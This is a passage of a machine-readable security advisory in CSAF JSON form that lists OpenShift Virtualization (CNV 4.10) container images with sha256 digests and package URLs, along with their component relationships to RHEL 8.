"product_id": "container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-marker\u0026tag=v4.10.5-1"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64",
"product": {
"name": "container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64",
"product_id": "container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-plugin\u0026tag=v4.10.5-1"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64",
"product": {
"name": "container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64",
"product_id": "container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-api\u0026tag=v4.10.5-3"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64",
"product": {
"name": "container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64",
"product_id": "container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-artifacts-server\u0026tag=v4.10.5-3"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64",
"product": {
"name": "container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64",
"product_id": "container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-apiserver\u0026tag=v4.10.5-1"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64",
"product": {
"name": "container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64",
"product_id": "container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-cloner\u0026tag=v4.10.5-1"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64",
"product": {
"name": "container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64",
"product_id": "container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-controller\u0026tag=v4.10.5-1"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64",
"product": {
"name": "container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64",
"product_id": "container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-importer\u0026tag=v4.10.5-1"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64",
"product": {
"name": "container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64",
"product_id": "container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-operator\u0026tag=v4.10.5-1"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64",
"product": {
"name": "container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64",
"product_id": "container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadproxy\u0026tag=v4.10.5-1"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64",
"product": {
"name": "container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64",
"product_id": "container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadserver\u0026tag=v4.10.5-1"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64",
"product": {
"name": "container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64",
"product_id": "container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-controller\u0026tag=v4.10.5-3"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64",
"product": {
"name": "container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64",
"product_id": "container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-handler\u0026tag=v4.10.5-3"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64",
"product": {
"name": "container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64",
"product_id": "container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virtio-win\u0026tag=v4.10.5-1"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64",
"product": {
"name": "container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64",
"product_id": "container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-launcher\u0026tag=v4.10.5-3"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64",
"product": {
"name": "container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64",
"product_id": "container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-operator\u0026tag=v4.10.5-3"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64 as a component of CNV 4.10 for RHEL 8",
"product_id": "8Base-CNV-4.10:container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64"
},
"product_reference": "container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64",
"relates_to_product_reference": "8Base-CNV-4.10"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64 as a component of CNV 4.10 for RHEL 8",
"product_id": "8Base-CNV-4.10:container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64"
},
"product_reference": "container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64",
"relates_to_product_reference": "8Base-CNV-4.10"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64 as a component of CNV 4.10 for RHEL 8",
"product_id": "8Base-CNV-4.10:container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64"
},
"product_reference": "container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64",
"relates_to_product_reference": "8Base-CNV-4.10"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64 as a component of CNV 4.10 for RHEL 8",
"product_id": "8Base-CNV-4.10:container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64"
},
"product_reference": "container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64",
"relates_to_product_reference": "8Base-CNV-4.10"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64 as a component of CNV 4.10 for RHEL 8",
"product_id": "8Base-CNV-4.10:container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64"
},
"product_reference": "container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64",
"relates_to_product_reference": "8Base-CNV-4.10"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64 as a component of CNV 4.10 for RHEL 8",
"product_id": "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64"
},
"product_reference": "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64",
"relates_to_product_reference": "8Base-CNV-4.10"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64 as a component of CNV 4.10 for RHEL 8",
"product_id": "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64"
},
"product_reference": "container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64",
"relates_to_product_reference": "8Base-CNV-4.10"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64 as a component of CNV 4.10 for RHEL 8",
"product_id": "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64"
},
"product_reference": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64",
"relates_to_product_reference": "8Base-CNV-4.10"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64 as a component of CNV 4.10 for RHEL 8",
"product_id": "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64"
},
"product_reference": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64",
"relates_to_product_reference": "8Base-CNV-4.10"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64 as a component of CNV 4.10 for RHEL 8",
"product_id": "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64"
},
"product_reference": "container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64",
"relates_to_product_reference": "8Base-CNV-4.10"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64 as a component of CNV 4.10 for RHEL 8",
"product_id": "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64"
},
"product_reference": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64",
"relates_to_product_reference": "8Base-CNV-4.10"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64 as a component of CNV 4.10 for RHEL 8",
"product_id": "8Base-CNV-4.10:container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64"
},
"product_reference": "container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64",
"relates_to_product_reference": "8Base-CNV-4.10"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64 as a component of CNV 4.10 for RHEL 8",
"product_id": "8Base-CNV-4.10:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64"
},
"product_reference": "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64",
"relates_to_product_reference": "8Base-CNV-4.10"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64 as a component of CNV 4.10 for RHEL 8",
"product_id": "8Base-CNV-4.10:container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64"
},
"product_reference": "container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64",
"relates_to_product_reference": "8Base-CNV-4.10"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64 as a component of CNV 4.10 for RHEL 8",
"product_id": "8Base-CNV-4.10:container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64"
},
"product_reference": "container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64",
"relates_to_product_reference": "8Base-CNV-4.10"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64 as a component of CNV 4.10 for RHEL 8",
"product_id": "8Base-CNV-4.10:container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64"
},
"product_reference": "container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64",
"relates_to_product_reference": "8Base-CNV-4.10"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64 as a component of CNV 4.10 for RHEL 8",
"product_id": "8Base-CNV-4.10:container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64"
},
"product_reference": "container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64",
"relates_to_product_reference": "8Base-CNV-4.10"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64 as a component of CNV 4.10 for RHEL 8",
"product_id": "8Base-CNV-4.10:container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64"
},
"product_reference": "container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64",
"relates_to_product_reference": "8Base-CNV-4.10"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64 as a component of CNV 4.10 for RHEL 8",
"product_id": "8Base-CNV-4.10:container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64"
},
"product_reference": "container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64",
"relates_to_product_reference": "8Base-CNV-4.10"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64 as a component of CNV 4.10 for RHEL 8",
"product_id": "8Base-CNV-4.10:container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64"
},
"product_reference": "container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64",
"relates_to_product_reference": "8Base-CNV-4.10"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64 as a component of CNV 4.10 for RHEL 8",
"product_id": "8Base-CNV-4.10:container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64"
},
"product_reference": "container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64",
"relates_to_product_reference": "8Base-CNV-4.10"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64 as a component of CNV 4.10 for RHEL 8",
"product_id": "8Base-CNV-4.10:container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64"
},
"product_reference": "container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64",
"relates_to_product_reference": "8Base-CNV-4.10"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64 as a component of CNV 4.10 for RHEL 8",
"product_id": "8Base-CNV-4.10:container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64"
},
"product_reference": "container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64",
"relates_to_product_reference": "8Base-CNV-4.10"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64 as a component of CNV 4.10 for RHEL 8",
"product_id": "8Base-CNV-4.10:container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64"
},
"product_reference": "container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64",
"relates_to_product_reference": "8Base-CNV-4.10"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64 as a component of CNV 4.10 for RHEL 8",
"product_id": "8Base-CNV-4.10:container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64"
},
"product_reference": "container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64",
"relates_to_product_reference": "8Base-CNV-4.10"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64 as a component of CNV 4.10 for RHEL 8",
"product_id": "8Base-CNV-4.10:container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64"
},
"product_reference": "container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64",
"relates_to_product_reference": "8Base-CNV-4.10"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64 as a component of CNV 4.10 for RHEL 8",
"product_id": "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64"
},
"product_reference": "container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64",
"relates_to_product_reference": "8Base-CNV-4.10"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64 as a component of CNV 4.10 for RHEL 8",
"product_id": "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64"
},
"product_reference": "container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64",
"relates_to_product_reference": "8Base-CNV-4.10"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64 as a component of CNV 4.10 for RHEL 8",
